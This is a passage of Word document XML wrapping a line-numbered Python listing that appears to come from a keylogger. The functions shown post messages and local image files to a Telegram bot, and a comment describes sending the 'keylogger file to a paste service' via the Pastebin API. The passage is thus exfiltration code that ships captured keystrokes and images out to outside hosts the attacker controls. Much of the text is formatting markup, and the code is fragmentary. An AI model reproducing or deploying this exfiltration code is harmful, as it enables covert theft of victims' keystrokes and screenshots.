          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_message</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>messag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54" w:name="l307"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">307  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>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55" w:name="l308"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">308  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="655"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">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21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_get_chatid</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="656" w:name="l309"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">309  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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id: {} Username: {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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57" w:name="l310"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">310  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="657"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">message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quote_plus</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658" w:name="l311"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">311  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">params </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'?text="{}"&amp;chat_id={}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>messag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59" w:name="l312"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">312  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="659"/>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SEND </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="660" w:name="l313"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">313  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>forma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61" w:name="l314"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">314  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="661"/>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62" w:name="l315"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">315  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="662"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">content </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </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63" w:name="l316"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">316  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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64" w:name="l317"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">317  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="664"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="665" w:name="l318"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">318  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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66" w:name="l319"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">319  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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67" w:name="l320"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">320  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="667"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>return None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="668" w:name="l321"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">321  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="669" w:name="l322"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">322  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="669"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="670" w:name="l323"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">323  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="670"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sends local file image to a Telegram Bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="671" w:name="l324"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">324  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="671"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_image</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>image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72" w:name="l325"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">325  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="672"/>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73" w:name="l326"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">326  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="67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image: {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>image_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="674" w:name="l327"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">327  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="674"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'photo'</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image_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>"rb"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="l328"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">328  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">data_chat </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'chat_id'</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76" w:name="l329"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">329  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>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SENDPHOTO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="677" w:name="l330"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">330  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="677"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">resp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post</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data_chat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="678" w:name="l331"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">331  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="67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 {} {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>resp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>status_code</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reason</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79" w:name="l332"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">332  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="67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80" w:name="l333"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">333  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="68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81" w:name="l334"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">334  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="681"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="682" w:name="l335"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">335  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="683" w:name="l336"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">336  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="683"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sends keylogger file to a paste service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="l337"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">337  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="684"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># : file_name = full path of file to send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="685" w:name="l338"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">338  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># : service = 1 =&gt; Pastebin      https://pastebin.com/api        example: https://pastebin.com/tW4Z2KXG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="686" w:name="l339"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">339  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="686"/>
